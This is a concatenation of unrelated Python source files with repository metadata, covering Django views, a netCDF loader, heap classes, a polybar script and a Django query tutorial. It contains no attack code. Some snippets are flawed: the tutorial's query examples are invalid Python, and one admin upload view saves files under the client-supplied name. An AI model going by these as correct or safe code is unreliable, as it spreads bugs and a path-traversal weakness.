c.post('/classphoto/1/save_bio/', self.BIO_DATA) self.assertRedirects(resp, '/classphoto/1/') bios = classphoto_api.get_bios(0) self.assertEquals(len(bios), 0)
2,548
marketing/views.py
devmedtz/sogea
3
2171687
from django.conf import settings from django.contrib import messages from django.http import HttpResponseRedirect from django.shortcuts import render from .forms import EmailSignupForm from .models import EmailSignup def email_list_signup(request): form = EmailSignupForm(request.POST or None) if request.method == "POST": if form.is_valid(): email_signup_qs = EmailSignup.objects.filter(email=form.instance.email) if email_signup_qs.exists(): messages.info(request, "You are already subscribed") else: form.save() messages.success(request, "You are successfully subscribed") return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
744
.config/polybar/scripts/updates.py
bacanhim/.dotfiles
1
2171895
import subprocess getVersion = subprocess.Popen("checkupdates | wc -l", shell=True, stdout=subprocess.PIPE).stdout version = getVersion.read() if(version.decode() == "0\n"): print("") else: print(version.decode())
217
lib/datasets/roidb.py
sibeiyang/sgmn
130
2172326
import os.path as osp import numpy as np from opt import parse_opt import h5py from glob import glob import json opt = parse_opt() opt = vars(opt) class Roidb(object): def __init__(self, image_set, model_method): self.image_set = image_set self.model_method = model_method self._data_path = osp.join(opt['data_root'], 'gt_objects') self._image_ids, self._roidb, self._h5_files, self._h5_lrel_files = self._load_roidb() def _load_roidb(self): info_file = osp.join(self._data_path, 'gt_objects_info.json') num_files = len(glob(osp.join(self._data_path, 'gt_objects_*.h5'))) h5_paths = [osp.join(self._data_path, 'gt_objects_%d.h5' % n) for n in range(num_files)] h5_lrel_paths = [osp.join(self._data_path, 'lrel_gt_objs_%d.h5' % n) for n in range(num_files)] with open(info_file) as f: all_info = json.load(f) h5_files = [h5py.File(path, 'r') for path in h5_paths] image_ids = [] data = {} for img_id in all_info: info = all_info[img_id] file, idx, num = info['file'], info['idx'], info['objectsNum'] bbox = h5_files[file]['bboxes'][idx] if 'cls' in h5_files[file]: cls = h5_files[file]['cls'][idx] else: cls = np.ones((num,), dtype=np.int) * 999999 width = info['width'] height = info['height'] image_ids.append(img_id) data[img_id] = {'size': np.array([width, height], dtype=np.float32), 'num_objs': num, 'cls': np.array(cls[0:num], dtype=np.float32), 'box': np.array(bbox[0:num,:], dtype=np.float32), 'file': file, 'idx': idx} if self.model_method in ['cmrin', 'dga']: h5_lrel_files = [h5py.File(path, 'r') for path in h5_lrel_paths] return image_ids, data, h5_files, h5_lrel_files else: return image_ids, data, h5_files, None @property def image_ids(self): return self._image_ids @property def roidb(self): return self._roidb @property def num_images(self): return len(self.image_id) @property def h5_files(self): return self._h5_files @property def h5_lrel_files(self): return self._h5_lrel_files
2,495
snakypy/zshpower/commands/reset.py
williamcanin/zshpower
10
2172045
from snakypy.helpers import printer from snakypy.helpers.ansi import FG from snakypy.helpers.catches.generic import whoami from snakypy.zshpower.commands.utils.handle import records from snakypy.zshpower.config.base import Base from snakypy.zshpower.config.config import config_content from snakypy.zshpower.database.dao import DAO from snakypy.zshpower.utils.check import checking_init from snakypy.zshpower.utils.modifiers import create_toml from snakypy.zshpower.utils.process import reload_zsh class ResetCommand(Base): def __init__(self, home: str): Base.__init__(self, home) def run(self, arguments: dict) -> None: checking_init(self.HOME, self.logfile) if arguments["--config"]: create_toml(config_content, self.config_file, force=True) printer("Reset process finished.", foreground=FG().FINISH) self.log.record( f"User ({whoami()}) reset settings.", colorize=True, level="info" ) reload_zsh() elif arguments["--db"]: DAO().create_table(self.tbl_main) records("insert", "ZSHPower Restoring the database ...", FG().QUESTION) printer("Done!", foreground=FG().FINISH) self.log.record( f"User ({whoami()}) reset database.", colorize=True, level="info" )
1,353
ocw/data_source/local.py
vadian/climate
0
2169622
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. import calendar from datetime import timedelta ,datetime import re import string from ocw.dataset import Dataset import ocw.utils as utils import netCDF4 import numpy import numpy.ma as ma LAT_NAMES = ['x', 'rlat', 'rlats', 'lat', 'lats', 'latitude', 'latitudes'] LON_NAMES = ['y', 'rlon', 'rlons', 'lon', 'lons', 'longitude', 'longitudes'] TIME_NAMES = ['time', 'times', 'date', 'dates', 'julian'] def _get_netcdf_variable_name(valid_var_names, netcdf, netcdf_var): ''' Determine if one of a set of variable names are in a NetCDF Dataset. Looks for an occurrence of a valid_var_name in the NetCDF variable data. This is useful for automatically determining the names of the lat, lon, and time variable names inside of a dataset object. :param valid_var_names: The possible variable names to search for in the netCDF object. :type valid_var_names: List of Strings :param netcdf: The netCDF Dataset object in which to check for valid_var_names. :type netcdf: netcdf4.Dataset :param netcdf_var: The relevant variable name to search over in the netcdf object. This is used to narrow down the search for valid variable names by first checking the desired variable's dimension values for one or more of the valid variable names. :returns: The variable from valid_var_names that it locates in the netCDF object. :raises ValueError: When unable to locate a single matching variable name in the NetCDF Dataset from the supplied list of valid variable names. ''' # Check for valid variable names in netCDF variable dimensions dimensions = netcdf.variables[netcdf_var].dimensions dims_lower = [dim.encode().lower() for dim in dimensions] intersect = set(valid_var_names).intersection(dims_lower) if len(intersect) == 1: # Retrieve the name of the dimension where we found the matching # variable name index = dims_lower.index(intersect.pop()) dimension_name = dimensions[index].encode() # Locate all of the variables that share the dimension that we matched # earlier. If the dimension's name matches then that variable is # potentially what we want to return to the user. possible_vars = [] for var in netcdf.variables.keys(): var_dimensions = netcdf.variables[var].dimensions # Skip any dimensions are > 1D if len(var_dimensions) != 1: continue if var_dimensions[0].encode() == dimension_name: possible_vars.append(var) # If there are multiple variables with matching dimension names then we # aren't able to determining the correct variable name using the # variable dimensions. We need to try a different approach. Otherwise, # we're done! if len(possible_vars) == 1: return possible_vars[0] # Check for valid variable names in netCDF variable names variables = netcdf.variables.keys() vars_lower = [var.encode().lower() for var in variables] intersect = set(valid_var_names).intersection(vars_lower) if len(intersect) == 1: index = vars_lower.index(intersect.pop()) return variables[index] # If we couldn't locate a single matching valid variable then we're unable # to automatically determine the variable names for the user. error = ( "Unable to locate a single matching variable name from the " "supplied list of valid variable names. " ) raise ValueError(error) def load_file(file_path, variable_name, elevation_index=0, name='', lat_name=None, lon_name=None, time_name=None): ''' Load a NetCDF file into a Dataset. :param file_path: Path to the NetCDF file to load. :type file_path: :mod:`string` :param variable_name: The variable name to load from the NetCDF file. :type variable_name: :mod:`string` :param elevation_index: (Optional) The elevation index for which data should be returned. Climate data is often times 4 dimensional data. Some datasets will have readins at different height/elevation levels. OCW expects 3D data so a single layer needs to be stripped out when loading. By default, the first elevation layer is used. If desired you may specify the elevation value to use. :type elevation_index: :class:`int` :param name: (Optional) A name for the loaded dataset. :type name: :mod:`string` :param lat_name: (Optional) The latitude variable name to extract from the dataset. :type lat_name: :mod:`string` :param lon_name: (Optional) The longitude variable name to extract from the dataset. :type lon_name: :mod:`string` :param time_name: (Optional) The time variable name to extract from the dataset. :type time_name: :mod:`string` :returns: An OCW Dataset object with the requested variable's data from the NetCDF file. :rtype: :class:`dataset.Dataset` :raises ValueError: When the specified file path cannot be loaded by ndfCDF4 or when the lat/lon/time variable name cannot be determined automatically. ''' try: netcdf = netCDF4.Dataset(file_path, mode='r') except RuntimeError: err = "Dataset filepath is invalid. Please ensure it is correct." raise ValueError(err) except: err = ( "The given file cannot be loaded. Please ensure that it is a valid " "NetCDF file. If problems persist, report them to the project's " "mailing list." ) raise ValueError(err) if not lat_name: lat_name = _get_netcdf_variable_name(LAT_NAMES, netcdf, variable_name) if not lon_name: lon_name = _get_netcdf_variable_name(LON_NAMES, netcdf, variable_name) if not time_name: time_name = _get_netcdf_variable_name(TIME_NAMES, netcdf, variable_name) lats = netcdf.variables[lat_name][:] lons = netcdf.variables[lon_name][:] time_raw_values = netcdf.variables[time_name][:] times = utils.decode_time_values(netcdf, time_name) times = numpy.array(times) values = ma.array(netcdf.variables[variable_name][:]) # If the values are 4D then we need to strip out the elevation index if len(values.shape) == 4: # Determine the set of possible elevation dimension names excluding # the list of names that are used for the lat, lon, and time values. dims = netcdf.variables[variable_name].dimensions dimension_names = [dim_name.encode() for dim_name in dims] lat_lon_time_var_names = [lat_name, lon_name, time_name] elev_names = set(dimension_names) - set(lat_lon_time_var_names) # Grab the index value for the elevation values level_index = dimension_names.index(elev_names.pop()) # Strip out the elevation values so we're left with a 3D array. if level_index == 0: values = values [elevation_index,:,:,:] elif level_index == 1: values = values [:,elevation_index,:,:] elif level_index == 2: values = values [:,:,elevation_index,:] else: values = values [:,:,:,elevation_index] return Dataset(lats, lons, times, values, variable_name, name=name)
8,238
store/adminshop/views/taller.py
vallemrv/my_store_test
0
2171893
# -*- coding: utf-8 -*- # @Author: <NAME> <valle> # @Date: 29-Sep-2017 # @Email: <EMAIL> # @Last modified by: valle # @Last modified time: 17-Dec-2017 # @License: Apache license vesion 2.0 from django.db.models import Q from django.shortcuts import render, redirect from django.http import HttpResponse from django.conf import settings from django.contrib.auth.decorators import login_required, permission_required from adminshop.forms import (TipoTesteoForm, FinTesteoForm, ActuacionesForm, NotasReparacionForm) from adminshop.models import (Productos, ListaTesteo, Testeo, Presupuesto, Clientes, Historial, Reparaciones, NotasReparacion, ESTADO_CHOICES_TESTEO) from adminshop.utility import save_historial from tokenapi.http import JsonError, JsonResponse import threading def send_men_rep(cliente, estado): from django.core.mail import send_mail from django.template.loader import render_to_string if estado=="OK": mens = "terminal_reparado" asunto = "Terminal reparado" else: mens = "terminal_no_reparado" asunto = "Reparacion no viable" msg_plain = render_to_string(settings.BASE_DIR+'/templates/email/%s.html' % mens, {'nombre': cliente.nombre_completo}) send_mail( asunto, msg_plain, "<EMAIL>", [cliente.email], ) @login_required(login_url='login_tk') def add_nota_reparacion(request, id_pres): if request.method == "POST": f_notas = NotasReparacionForm(request.POST) if f_notas.is_valid(): notas = f_notas.save(commit=False) notas.usuario_id = request.user.pk notas.presupuesto_id = id_pres presupuesto = Presupuesto.objects.get(pk=id_pres) notas.save() return redirect("reparacion", id_producto=presupuesto.producto.pk) @login_required(login_url='login_tk') def rm_nota_reparacion(request, id_nota, id_producto): try: NotasReparacion.objects.filter(pk=id_nota).delete() except Exception as e: pass return redirect("reparacion", id_producto=id_producto) @login_required(login_url='login_tk') def actuaciones(request, id_actuacion=-1): if not request.method == "POST" and id_actuacion == -1: f_actuacion = ActuacionesForm() return render(request, "taller/actuaciones.html", {"form": f_actuacion, "actuaciones": Reparaciones.objects.all(), "mensaje": "Actuacion nueva"}) elif not request.method == "POST" and id_actuacion > 0: f_actuacion = ActuacionesForm() try: actuacion = Reparaciones.objects.get(pk=id_actuacion) f_actuacion = ActuacionesForm(instance=actuacion) except: pass return render(request, "taller/actuaciones.html", {"form": f_actuacion, "actuaciones": Reparaciones.objects.all(), "mensaje": "Editar actuacion"}) elif id_actuacion > 0: try: actuacion = Reparaciones.objects.get(pk=id_actuacion) f_actuacion = ActuacionesForm( request.POST, instance=actuacion) if f_actuacion.is_valid(): f_actuacion.save() f_actuacion = ActuacionesForm() except: pass return redirect("actuaciones") else: f_actuacion = ActuacionesForm(request.POST) if f_actuacion.is_valid(): f_actuacion.save() f_actuacion = ActuacionesForm() return render(request, "taller/actuaciones.html", {"form": f_actuacion, "actuaciones": Reparaciones.objects.all(), "mensaje": "Actuacion nueva"}) @login_required(login_url='login_tk') def rm_actuacion(request, id_actuacion): try: Reparaciones.objects.get(pk=id_actuacion).delete() except: pass return redirect("actuaciones") @login_required(login_url='login_tk') def find_actuacion_taller(request): codigo = request.POST['codigo'] datos = Reparaciones.objects.filter(Q(detalle__contains=codigo) | Q(codigo__contains=codigo)) f_actuacion = ActuacionesForm() return render(request, "taller/actuaciones.html", {"form": f_actuacion, "actuaciones": datos}) @login_required(login_url='login_tk') def set_reparado(request, id_producto, estado='OK'): pres = Presupuesto.objects.filter(producto__pk=id_producto) if len(pres) > 0: pres = pres[0] cliente = pres.cliente producto = Productos.objects.get(pk=id_producto) producto.estado = "OK" producto.save() #Guardamos el historial de la accion save_historial(request.user.pk, cliente.pk, id_producto, "Producto reparado...") threading.Thread(target=send_men_rep, args=(cliente, estado,)).start() return redirect("lista_productos", estado='RP') @login_required(login_url='login_tk') def reparacion(request, id_producto): try: pres = Presupuesto.objects.filter(producto__pk=id_producto) cliente = Clientes() if len(pres) > 0: pres = pres[0] cliente = pres.cliente except: pres = Presupuesto() form_notas = NotasReparacionForm() return render (request, "taller/hoja_reparacion.html", {"c": cliente, "p": pres, "notas": NotasReparacion.objects.filter(presupuesto_id=pres.pk), "form_notas": form_notas}) @login_required(login_url='login_tk') def save_actuacion(request): if request.method == "POST": try: actuacion = Reparaciones.objects.get(codigo=request.POST.get("codigo")) except: actuacion = Reparaciones() actuacion.codigo=request.POST["codigo"] actuacion.detalle=request.POST["detalle"] actuacion.precio=request.POST["precio"].replace(",",".") actuacion.save() datos = { "result": True, "pk": actuacion.pk, "codigo": actuacion.codigo, "can": 1, "descuento": 0, "detalle": actuacion.detalle, "precio": actuacion.precio, } return JsonResponse(datos) return JsonError("Solo puede ser peticiones POST") @login_required(login_url='login_tk') def tipo_testeo(request, id_tipo=-1): if not request.method == "POST" and id_tipo == -1: f_tipo = TipoTesteoForm() return render(request, "taller/tipo_testeo.html", {"form": f_tipo, "tipos": ListaTesteo.objects.all(), "mensaje": "Tipo nuevo"}) elif not request.method == "POST" and id_tipo > 0: f_tipo = TipoTesteoForm() try: catergoria = ListaTesteo.objects.get(pk=id_tipo) f_tipo = TipoTesteoForm(instance=catergoria) except: pass return render(request, "taller/tipo_testeo.html", {"form": f_tipo, "tipos": ListaTesteo.objects.all(), "mensaje": "Editar tipo"}) elif id_tipo > 0: try: catergoria = ListaTesteo.objects.get(pk=id_tipo) f_tipo = TipoTesteoForm( request.POST, instance=catergoria) if f_tipo.is_valid(): f_tipo.save() except: pass return redirect("tipo_testeo") else: f_tipo = TipoTesteoForm(request.POST) if f_tipo.is_valid(): f_tipo.save() return redirect("tipo_testeo") @login_required(login_url='login_tk') def rm_tipo_testeo(request, id_tipo): try: ListaTesteo.objects.get(pk=id_tipo).delete() except: pass return redirect("tipo_testeo") @login_required(login_url='login_tk') def testeo(request, id_producto): producto = Productos.objects.get(pk=id_producto) return render(request, "taller/testeo.html",{ "p": producto, "ListaTesteo": ListaTesteo.objects.filter(categoria=producto.modelo.categoria), "estado_test": ESTADO_CHOICES_TESTEO, "form": FinTesteoForm(instance=producto) }) @login_required(login_url='login_tk') def set_estado_testeo(request, test_id, p_id, estado): testeos = Testeo.objects.filter(Q(descripcion__pk=test_id) & Q(producto__pk=p_id)) if len(testeos) > 0: test = testeos[0] else: test = Testeo() test.producto_id = p_id test.estado = estado test.descripcion_id = test_id test.save() return HttpResponse("success") @login_required(login_url='login_tk') def finalizar_testeo(request): if request.method == "POST": p_id = request.POST["p_id"] producto = Productos.objects.get(pk=p_id) f_p = FinTesteoForm(request.POST, instance=producto) if f_p.is_valid(): p = f_p.save() p.estado = "TD" p.save() h = Historial() clientes = Historial.objects.filter(producto_id=p.pk) cliente_id = 1 if len(clientes) > 0: cliente_id = clientes[0].cliente_id h.producto_id = p.id h.usuario_id = request.user.id h.cliente_id = cliente_id h.detalle = "Finalización del testeo y valoración del producto" h.save() return redirect("lista_productos", estado="OS") @login_required(login_url='login_tk') def volver_testear_producto(request, id_producto): p = Productos.objects.get(pk=id_producto) p.estado = "OS" p.save() return redirect("tienda")
9,851
include/myfunc.py
xianGuiye/AtCoder
1
2172560
def cmb(n,r): r = min(n-r,r) if r == 0: return 1 over = reduce(mul, range(n, n - r, -1),True) under = reduce(mul, range(1,r + 1),True) return over // under
187
fmridenoise/utils/traits.py
brain-net-cog/fMRIDenoise
22
2172362
import typing as t from traits.trait_types import Union, TraitType, Instance from traits.trait_base import _Undefined, Undefined def Optional(trait: TraitType) -> Union: """ Return Union of function argument and Instance(_Undefined) Args: trait (TraitType): optional trait Returns: union with undefined instance """ return Union(trait, Instance(_Undefined)) def remove_undefined(iterable: t.Iterable) -> t.Iterable: """ Creates generator that ignores all instances of _Undefined Args: iterable (Iterable): objects iterable Returns: generator """ return (element for element in iterable if element is not Undefined)
702
aligned/HorizontalMaxPool2D.py
LT1st/ReID_Alined_beginer
370
2172348
import torch.nn as nn class HorizontalMaxPool2d(nn.Module): def __init__(self): super(HorizontalMaxPool2d, self).__init__() def forward(self, x): inp_size = x.size() return nn.functional.max_pool2d(input=x,kernel_size= (1, inp_size[3]))
271
02-django/04-queries-and-models/advanced-models.py
pjfreeze/platform-engineer-intermediate
2
2171436
## Field Choices # Yesterday we created several models including the Book model which had a Char field "genre". # While a free form "genre" field is great, it would be more helpful to specifically categorize # books by genre, which would require a consistent set. from django.db import models from libs import fields as mm_fields from libs.model_mixins import audit # This should be really similar to what you ended up with yesterday for the book model based on the # exercise. We are going to modify down below this one. class BookOne(audit.CreationAuditMixin, audit.DeletionMixin): _format = u'{} - title: {}, author: {}, genre: {}' id = mm_fields.BigAutoField(primary_key=True) title = models.CharField(max_length=mm_fields.LONG_CHAR_LEN) author = models.CharField(max_length=mm_fields.SHORT_CHAR_LEN) # The CharField has a couple arguments we can add to let us restrict the options available genre = models.CharField(max_length=mm_fields.SHORT_CHAR_LEN) def __unicode__(self): return self._format.format( self.id, self.title, self.author, self.genre, ) # We can make a generic class that has all of the choices we want by creating properties # for each one and then a list of all properties that includes all of them, the name choices is not # important, but whatever we call the collection is what must be referenced down below in the # BookTwo model. class Genres(object): MYSTERY = 'mystery' SCIENCE = 'science' HISTORY = 'history' HUMOR = 'humor' options = ( (MYSTERY, 'Mystery'), (SCIENCE, 'Science'), (HISTORY, 'History'), (HUMOR, 'Humor'), ) # Here we have updated the book model's genre field to include some new things that use the Genres # class we created above. Within Django's admin screen, this will appear as a select drop down. class BookTwo(audit.CreationAuditMixin, audit.DeletionMixin): _format = u'{} - title: {}, author: {}, genre: {}' id = mm_fields.BigAutoField(primary_key=True) title = models.CharField(max_length=mm_fields.LONG_CHAR_LEN) author = models.CharField(max_length=mm_fields.SHORT_CHAR_LEN) # We can add a "choices" keyword and reference the choices list on the Genres class # This will limit the options a book can use to the list from above genre = models.CharField(max_length=mm_fields.SHORT_CHAR_LEN, choices=Genres.options) def __unicode__(self): return self._format.format( self.id, self.title, self.author, self.genre, ) ## ContentTypes # Yesterday we talked about Foreign Keys and the forward and reverse relationship they create # between 2 models. Usually 1 model includes a foreign key to the other, which works for many cases. # For more generic types of content such as tags, comments, or likes, it is unnecessary to create # a unique model for each "type" of relationship. For example the difference between "liking" an # organization versus a context is just which model it references. # Django provides us the contenttypes framework to help us solve problems that situations like the # above can create. Django's contenttypes framework let's us create models with 3 attributes, two # are more standard fields, one is a placeholder that ends up housing the content we are after. # Below is an example of how we would use that framework. class GenericModelOne(models.Model): # By default we can use a content_type field which can use a normal BigForeignKey to that table which # has a row created for every model in the whole group of apps. content_type = mm_fields.BigForeignKey('django.contenttype') # we can include a BigIntegerField which holds the same information a Foreign Key does, # (the ID or primary key to the other table), not a foreign key because it is not a specific # type of object object_id = models.BigIntegerField() # You can see we have 1 reference to the type of content and another to the id of the content. # Together we know what kind and which one of a content type to go get. # Although we do not currently support serializing the last field (content_object), Django allows # you to carry that object on the model. # A model with all of the content types fields looks like this: class GenericModelTwo(models.Model): content_type = mm_fields.BigForeignKey('django.contenttypes') object_id = models.BigIntegerField() content_object = generic.GenericForeignKey() ## Q Objects # The Q object gives us access to more powerful query sets. We can create more powerful conditions # based and/or. For instance, we could search for a book with that matches the "mystery" genre or # is by a specific author. from django.db import Q, F Books.objects.filter( # Here we are checking for books with the author of me or the title that matches that below. Q(author="<NAME>") | Q(title="Funny Things I Say") ) Books.objects.filter( author__icontains="pet", author__icontains="eze", ) # We could do a more complex match based on the inclusion of two things Books.objects.filter( # We can make sure the author field now contains more than one specific thing Q(author__icontains="pet") & (Q(author__icontains="eze") | Q(title="Funny Things I Say")), genre="History", ) # There are some pretty complex queries using the Q object in the "ContestSummaryFilterBackend" in # the election view sets. ## F Objects # F objects let us manipulate the current object based on a current property without having to # retrieve the value from the database. # If we have a group of articles, we can assign the first one to be featured only if it has been # published, without having to go and get the item first. The only thing this set of statements does # is assignment, rather than retrieval. article = Article.objects.filter(published=True).first() article.featured = F('published') article.save() # As the documentation notes, the current instance of this article will not reflect the updated # value because it never retrieved the updated version. Everything was telling the database what # to do rather than bringing it back into your shell or script. # Here we have an updated version that would reflect the new value for featured article = Article.objects.get(pk=article.id) # Another way you can use the F Object is to combine the above statements. On the group of objects, # we have selected the first one, and updated it to use the value of the current objects published # value for the featured. Article.objects .first() .update( featured=F('published') ) # We could also have created a slug in a statement that wouldn't even need a iterative loop by using # a similar syntax: Article.objects.all() .update( slug=F('title').slugify() )
6,881
Day-075/15-median.py
arvimal/100DaysofCode
1
2172263
#!/usr/bin/env python3 def median(data): """Finding the median from a list""" # 1. Sort the list new_data = sorted(data) if len(new_data) == 1: print(new_data[0]) return new_data[0] else: # Odd if len(new_data) % 2 == 1: mid_value = len(new_data) // 2 print(new_data[mid_value]) return new_data[mid_value] # Even elif len(new_data) % 2 == 0: mid_value = len(data) // 2 median_val = (new_data[mid_value] + new_data[mid_value - 1]) / 2.0 print(median_val) return median_val median([10, 5, 3, 7, 8, 23])
658
Drosophila/admin_views.py
JackCurragh/DARNED
0
2172519
from django.http import HttpResponseRedirect, HttpResponse from django.shortcuts import render_to_response from django.core.context_processors import csrf from forms import * from django.template import loader,RequestContext from django.contrib.admin.views.decorators import staff_member_required ########################## from models import * from os import system ############################################## ########Thoughts for implementation########## #Current state of update######## # Try to add information about assembly. And make it auto updatable def saveData(uploadedFileName): uploadedfile = str(uploadedFileName) # saving input file content destination = open('/home/DATA/Anmol/DARNED/uploadedFiles/Dmel/%s'%(uploadedfile),'wb+') for chunk in uploadedFileName.chunks(): destination.write(chunk) destination.close() def dataCheck(flname): infile = open("/home/DATA/Anmol/DARNED/uploadedFiles/Dmel/%s"%(flname)) for line in infile: data = line[:-1].split('\t') main = Main.objects.filter(chrom=data[0],coordinate=int(data[1]),strand=data[2]) if len(main) != 0: pbd = main.filter(pubid__pubid=data[7]) if len(pbd) == 0: try: pbdx = PubId.objects.get(pubid=data[7]) except: pbdx = PubId.objects.create(pubid = data[7],author= data[8],year=int(data[9])) main.pubid.add(pbdx) else: main = Main.objects.create(chrom=data[0],coordinate=int(data[1]),strand=data[2], dnanuc="A",rnanuc="I",seqtype = data[4]) if data[3] != '-': if data[4] == 'E': main.exotype = data[5] try: gene = Gene.objects.get(gene=data[3]) except: gene = Gene.objects.create(gene=data[3],ncbi='-') main.gene = gene if data[6] != '-': main.alu = data[6] try: pbd = PubId.objects.get(pubid=data[7]) except: pbd = PubId.objects.create(pubid = data[7],author = data[8],year=int(data[9])) main.pubid.add(pbd) main.save() infile.close() def upload_file(request): if request.method == 'POST': form = UploadFileForm(request.POST,request.FILES) if form.is_valid(): filename = request.FILES['infile'] flname = str(filename) saveData(request.FILES['infile']) dataCheck(flname) #return HttpResponseRedirect('/success/url/')# Write about successful file upload and logs on page.redirect link using a midddle file. put that file in temp folder else: form = UploadFileForm() toform = { 'form':form, 'action':'/du/' } tmplt = loader.get_template('admin/uploadfile.html') return HttpResponse(tmplt.render(RequestContext(request,toform))) # return render_to_response('/home/manu/Desktop/DARNED/templates/admin/uploadfile.html',{'form':form}) upload_file = staff_member_required(upload_file)# This is make function acceible only to administers
3,191
resposta_atividade-sem-04-T2/03pt2.py
MacgayverPeixoto/PEC_IFPI_186
0
2170950
#03pt2 preco=float(input()) valor=float(input()) valor_percen= preco * valor/100 aumento_percen = preco + valor_percen desconto_percen = preco - valor_percen print(f'{aumento_percen:.2f}') print(f'{desconto_percen:.2f}')
235
FeatureCollection/select_by_attributes.py
monocilindro/qgis-earthengine-examples
646
2171077
# GitHub URL: https://github.com/giswqs/qgis-earthengine-examples/tree/master/FeatureCollection/select_by_attributes.py #!/usr/bin/env python """Select by attributes """ import ee from ee_plugin import Map # Select North Dakota and South Dakota fc = ee.FeatureCollection('TIGER/2018/States') \ .filter(ee.Filter.Or( ee.Filter.eq('STUSPS', 'ND'), ee.Filter.eq('STUSPS', 'SD'), )) image = ee.Image().paint(fc, 0, 2) # Map.setCenter(-99.844, 37.649, 5) Map.centerObject(fc, 6) Map.addLayer(image, {'palette': 'FF0000'}, 'TIGER/2018/States')
569
RestFramework 1/api/views.py
LindaOuer/Django_Project
2
2171462
from django.http import HttpResponse, JsonResponse from django.views.decorators.csrf import csrf_exempt from rest_framework.parsers import JSONParser from hub.models import Project from .serializers import ProjectSerializer def projects_List(request): """List all projects Arguments: request {HttpRequest} -- """ if request.method == 'GET': projects = Project.objects.all() serializer = ProjectSerializer(projects, many=True) return JsonResponse(serializer.data, safe=False)
527
kpi/visiting_management/urls.py
UniversitaDellaCalabria/kpiManagement
0
2171181
from django.urls import path from . datatables import * from . views import * app_name = 'visiting' # app prefix prefix = 'visiting' urlpatterns = [ path(f'{prefix}/', dashboard, name='dashboard'), # datatables path(f'{prefix}/<str:structure_slug>/visitings.json', datatables_structure_visitings, name='structure_visitings_json'), path(f'{prefix}/<str:structure_slug>/', structure_visitings, name='structure_visitings'), path(f'{prefix}/<str:structure_slug>/new/', new_structure_visiting, name='new_structure_visiting'), path(f'{prefix}/<str:structure_slug>/<str:visiting_pk>/', structure_visiting, name='structure_visiting'), path(f'{prefix}/<str:structure_slug>/<str:visiting_pk>/edit/', edit_structure_visiting, name='edit_structure_visiting'), ]
832
heap/minmax_heap.py
anhtumai/data-structure-and-algorithms-collection
1
2172317
""" Heap is a binary tree-based data structure, can be implemented using a list. There are 2 types of heaps: - Max-Heap: The key representing the root must be greatest among the keys which present at all of its children. The same rule applies for all the subtrees. - Min-Heap: The key representing the root must be smallest among the keys which present at all of its children. The same rule applies for all the subtrees. Heap Public method: - size() -> int: return the number of elements - is_empty() -> bool: check if the heap is empty - peek() -> any: return the root value of the heap - poll() -> any: remove and return the root value of the heap. The heap perform self-tuning after removal - add() -> None: add new element to the heap For Min Heap only: - decrease_key(name: any, new_distance: Union[int | float]) -> None: Find the node with the given name, update its distance to lesser value (new_distance) ( This function is created specifically for graph finding algorithms, since we need to update the weight of a path when we find the shorter path. This function assumes that Node datatype has 'name' and 'distance' property) """ from typing import Union class Heap: def __init__(self, elems: list[any] = []): self.elems: list[any] = [] for elem in elems: self.add(elem) def _has_left(self, index: int) -> bool: return index * 2 + 1 < len(self.elems) def _has_right(self, index: int) -> bool: return index * 2 + 2 < len(self.elems) def _has_parent(self, index: int) -> bool: return index != 0 def _get_parent_index(self, index: int) -> int: return int((index - 1) / 2) def _get_left_index(self, index: int) -> int: return index * 2 + 1 def _get_right_index(self, index: int) -> int: return index * 2 + 2 def _get_value(self, index: int) -> any: return self.elems[index] def _get_left(self, index: int) -> any: return self._get_value(self._get_left_index(index)) def _get_right(self, index: int) -> any: return self._get_value(self._get_right_index(index)) def _get_parent(self, index: int) -> any: return self._get_value(self._get_parent_index(index)) def _heapify_up(self, start: int) -> None: raise NotImplementedError def _heapify_down(self, start: int = 0) -> None: raise NotImplementedError def size(self) -> int: return len(self.elems) def is_empty(self): return len(self.elems) == 0 def peek(self) -> any: """Return the root element of the heap""" if len(self.elems) == 0: raise RuntimeError("Heap is empty") return self.elems[0] def poll(self) -> any: """Return and remove the current root element in the min heap""" if len(self.elems) == 0: raise RuntimeError("Heap is empty") res = self.elems[0] self.elems[0] = self.elems[-1] del self.elems[-1] self._heapify_down() return res def add(self, item) -> None: """Add new element to the heap and perform self-tuning""" self.elems.append(item) self._heapify_up(len(self.elems) - 1) def __str__(self): return str(self.elems) class MinHeap(Heap): def _heapify_up(self, start: int) -> None: index = start while ( self._has_parent(index) and self._get_value(self._get_parent_index(index)) > self.elems[index] ): parent_index = self._get_parent_index(index) self.elems[parent_index], self.elems[index] = ( self.elems[index], self.elems[parent_index], ) index = self._get_parent_index(index) def _heapify_down(self, start: int = 0) -> None: index = start while self._has_left(index): smaller_child_index = self._get_left_index(index) if self._has_right(index) and self._get_right(index) < self._get_left( index ): smaller_child_index = self._get_right_index(index) if self.elems[index] < self.elems[smaller_child_index]: return self.elems[index], self.elems[smaller_child_index] = ( self.elems[smaller_child_index], self.elems[index], ) index = smaller_child_index def decrease_key(self, name: any, new_distance: Union[int, float]) -> None: """Find the node with the given name, decrease its distance to new_distance. Args: name: name of replaced node new_distance: new distance of updated node Assumptions: Elements in heap tree must have name and distance property """ for i in range(len(self.elems)): if self.elems[i].name == name: assert ( new_distance < self.elems[i].distance ), "new distance should be lesser than current distance" self.elems[i].distance = new_distance self._heapify_up(i) return class MaxHeap(Heap): def _heapify_up(self, start: int) -> None: index = start while ( self._has_parent(index) and self._get_value(self._get_parent_index(index)) < self.elems[index] ): parent_index = self._get_parent_index(index) self.elems[parent_index], self.elems[index] = ( self.elems[index], self.elems[parent_index], ) index = self._get_parent_index(index) def _heapify_down(self, start: int = 0) -> None: index = start while self._has_left(index): bigger_child_index = self._get_left_index(index) if self._has_right(index) and self._get_right(index) > self._get_left( index ): bigger_child_index = self._get_right_index(index) if self.elems[index] > self.elems[bigger_child_index]: return self.elems[index], self.elems[bigger_child_index] = ( self.elems[bigger_child_index], self.elems[index], ) index = bigger_child_index
6,407
copula/birth.py
PetropoulakisPanagiotis/copula
8
2171688
